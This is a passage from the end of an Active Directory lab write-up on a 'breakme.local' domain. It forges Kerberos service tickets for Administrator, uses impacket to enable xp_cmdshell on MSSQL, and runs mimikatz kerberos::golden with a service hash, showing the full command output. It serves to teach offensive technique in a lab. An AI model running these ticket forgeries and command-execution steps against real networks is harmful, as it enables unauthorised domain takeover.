Now check use the ticket and impersonate as Administrator.
┌──(kali㉿kali)-[~/Desktop/breakme.local]
└─$ export KRB5CCNAME=Administrator.ccache
┌──(kali㉿kali)-[~/Desktop/breakme.local]
└─$ impacket-mssqlclient -k -no-pass ws01.breakme.local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(WS01): Line 1: Changed database context to 'master'.
[*] INFO(WS01): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (170 3232)
[!] Press help for extra shell commands
SQL (BREAKME.LOCAL\Administrator dbo@master)> enable_xp_cmdshell
INFO(WS01): Line 196: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
INFO(WS01): Line 196: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (BREAKME.LOCAL\Administrator dbo@master)> xp_cmdshell whoami /all
output
--------------------------------------------------------------------------------
NULL
USER INFORMATION
----------------
NULL
User Name SID
================= ==============================================
breakme\svc_mssql S-1-5-21-3878086263-1604080912-3480837854-1165
NULL
NULL
GROUP INFORMATION
-----------------
NULL
Group Name Type SID Attributes
========================================== ================ =============================================================== ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Monitor Users Alias S-1-5-32-558 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\SERVICE Well-known group S-1-5-6 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT SERVICE\MSSQLSERVER Well-known group S-1-5-80-3880718306-3832830129-1677859214-2598158968-1052248003 Enabled by default, Enabled group, Group owner
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
Authentication authority asserted identity Well-known group S-1-18-1 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
NULL
NULL
PRIVILEGES INFORMATION
----------------------
NULL
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
NULL
NULL
USER CLAIMS INFORMATION
-----------------------
NULL
User claims unknown.
NULL
Kerberos support for Dynamic Access Control on this device has been disabled.
NULL
SQL (BREAKME.LOCAL\Administrator dbo@master)>We can see we are able to enable xp_cmdshell as impersonating as Administrator and execute command. We can also we the next door opening here. If we get a reverse shell from here we get a shell as breakme\svc_mssql. But we can see so interesting privileges like SeImpersonatePrivilege that directs us to do Potato Attack.
Now lets see how to do the same from Windows.
We can use the following commands for it
# with an NT hash
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /rc4:$serviceAccount_NThash /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt
# with an AES 128 key
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes128:$serviceAccount_aes128_key /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt
# with an AES 256 key
kerberos::golden /domain:$DOMAIN /sid:$DomainSID /aes256:$serviceAccount_aes256_key /user:$username_to_impersonate /target:$targetFQDN /service:$spn_type /ptt
C:\Users\Administrator\Desktop> .\mimikatz
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
kerberos::golden /domain:breakme.local /sid:S-1-5-21-3878086263-1604080912-3480837854 /rc4:74ED32086B1317B742C3A92148DF1019 /user:Administrator /target:ws01.breakme.local /service:MSSQLSvc /ptt
mimikatz # User : Administrator
Domain : breakme.local (BREAKME)
SID : S-1-5-21-3878086263-1604080912-3480837854
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 74ed32086b1317b742c3a92148df1019 - rc4_hmac_nt
Service : MSSQLSvc
Target : ws01.breakme.local
Lifetime : 18-03-2026 09:17:43 ; 15-03-2036 09:17:43 ; 15-03-2036 09:17:43
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'Administrator @ breakme.local' successfully submitted for current sessionOr we can save this as a file
C:\Users\Administrator\Desktop> .\mimikatz
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
kerberos::golden /domain:breakme.local /sid:S-1-5-21-3878086263-1604080912-3480837854 /rc4:74ED32086B1317B742C3A92148DF1019 /user:Administrator /target:ws01.breakme.local /service:MSSQLSvc /ticket:silver.kirbi
mimikatz # User : Administrator
Domain : breakme.local (BREAKME)
SID : S-1-5-21-3878086263-1604080912-3480837854
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 74ed32086b1317b742c3a92148df1019 - rc4_hmac_nt
Service : MSSQLSvc
Target : ws01.breakme.local
Lifetime : 18-03-2026 09:19:45 ; 15-03-2036 09:19:45 ; 15-03-2036 09:19:45
-> Ticket : silver.kirbi
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Final Ticket Saved to file !
C:\Users\Administrator\Desktop> klist
Current LogonId is 0:0x3e7
Cached Tickets: (2)
#0> Client: Administrator @ breakme.local
Server: krbtgt/breakme.local @ breakme.local
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 3/18/2026 8:18:45 (local)
End Time: 3/15/2036 8:18:45 (local)
Renew Time: 3/15/2036 8:18:45 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
#1> Client: Administrator @ breakme.local
Server: MSSQLSvc/ws01.breakme.local @ breakme.local
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 3/18/2026 9:17:43 (local)
End Time: 3/15/2036 9:17:43 (local)
Renew Time: 3/15/2036 9:17:43 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0
Kdc Called:
C:\Users\Administrator\Desktop> We can see both out Golden and ticket present for the session. Both the attacks are key to know.
So this is it for this write-up . Hope you enjoyed and learned from this. Bye!